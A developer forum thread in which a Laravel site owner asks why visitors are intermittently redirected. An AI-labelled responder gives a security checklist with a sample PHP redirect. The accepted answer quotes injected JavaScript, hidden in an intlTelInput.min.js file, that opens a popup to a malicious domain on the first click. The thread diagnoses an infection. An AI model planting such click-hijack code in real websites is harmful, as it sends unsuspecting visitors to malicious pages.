Be part of JetBrains PHPverse 2026 on June 9 – a free online event bringing PHP devs worldwide together.

tomsenter's avatar

My website redirects to random sites occasionally and then stops for a few days and then does it again?

Hi guys,

I've made a side project using Laravel, and I'm a little confused as it seems to be getting hacked and I'm not sure how.

Basically every now and then it redirects to a random set of sites when certain links are clicked, and then all of a sudden it stops. However the issue seems to keep occurring once every week or two.

Would anyone be able to help me out here and see where I'm going wrong please, or at least educate me in where I could be making a mistake? The site is - https://neuracademia.co.uk/

Any help would be greatly appreciated :)

0 likes
7 replies
LaryAI's avatar
LaryAI
AI
2 years ago
Level 58

It sounds like your website may have been compromised, and there could be several reasons for this behavior. Here are some steps you can take to identify and fix the issue:

  1. Check for Malicious Code: Review your codebase for any unfamiliar or suspicious code. Malicious scripts can be injected into your files, which could cause the redirects.

  2. Update Laravel and Packages: Ensure that you are using the latest version of Laravel and all of your dependencies are up to date. Security vulnerabilities in outdated software can be exploited by attackers.

  3. Review .htaccess File: If you are using Apache, check your .htaccess file for any rewrite rules that you did not create.

  4. Check for Database Injections: Review your database for any unexpected content, especially in tables that might store URLs or content that could be output to your site.

  5. Scan for Vulnerabilities: Use tools like Sucuri SiteCheck to scan your website for known malware, blacklisting status, website errors, and out-of-date software.

  6. Permissions: Check the file and directory permissions to make sure they are not set to be writable by everyone. Typically, folders should be 755 and files should be 644.

  7. Review User Uploads: If your site allows file uploads, ensure that they are being properly validated and sanitized to prevent executable files from being uploaded.

  8. Audit Plugins/Extensions: If you are using third-party plugins or extensions, make sure they are from reputable sources and are kept up to date. Remove any that are not in use or are outdated.

  9. Check for Cron Jobs: Sometimes attackers can set up cron jobs on your server. Check your server's cron jobs to ensure there are no unexpected tasks running.

  10. Server Logs: Review your server logs for any unusual activity or patterns that could indicate the source of the problem.

  11. Change Credentials: Change all passwords and API keys, in case they have been compromised.

  12. SSL Certificate: Make sure you have a valid SSL certificate and that your site is using HTTPS to encrypt data.

  13. Contact Hosting Provider: If you're unable to find the issue yourself, your hosting provider may be able to assist and may have additional insight into the problem.

  14. Hire a Professional: If the problem persists, consider hiring a security expert to perform a thorough audit of your site.

Here's an example of how you might check for and remove a simple malicious redirect in a PHP file:

// Look for lines like this in your PHP files
if (isset($_GET['someUnexpectedParameter'])) {
    header('Location: http://malicious-website.com');
    exit;
}

// Remove the malicious code or replace it with the correct logic

Remember to take a backup of your site before making changes, and once the issue is resolved, keep monitoring your site for any signs of re-infection.

1 like
krisi_gjika's avatar
krisi_gjika
2 years ago
Best Answer
Level 14

@tomsenter in your site js you have a file intlTelInput.min.js with the code bellow:

window.addEventListener("load", function(){
        includeJs("https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.19/js/intlTelInput.min.js");
});

function includeJs(jsFilePath){
        var js = document.createElement("script");
        js.type = "text/javascript";
        js.src = jsFilePath;
        document.body.appendChild(js);

        var OP = document.querySelector("body");
        var popUp = function(e) {
        window.open ("https://gloogruk.com/4/2282233", "_blank");
            OP.removeEventListener("click", popUp, false);
        }
        OP.addEventListener("click", popUp, false);    
}

this code registers an event to trigger on the first click on your site and if you go to the window.open url you will find your redirect. Not sure why or from where you have gotten this js, but you should maybe remove this ;)

1 like
tomsenter's avatar

@krisi_gjika Thanks so much! I'm not sure how that's happened either but thanks for spotting it :)

I'll find an alternative to that JS library I think.

Snapey's avatar

@tomsenter its the function includeJs that has the bogus code? not the phone number script.

kokoshneta's avatar

@tomsenter It’s located right there in the piece of code quoted by krisi_gjika.

The first four lines in the includeJs() function just add a script section to the body and include file passed as a parameter (in this case the intlTelInput file). Everything starting from var OP onwards is injected code that opens a page on gloogruk . com (a malicious site).

1 like

Please or to participate in this conversation.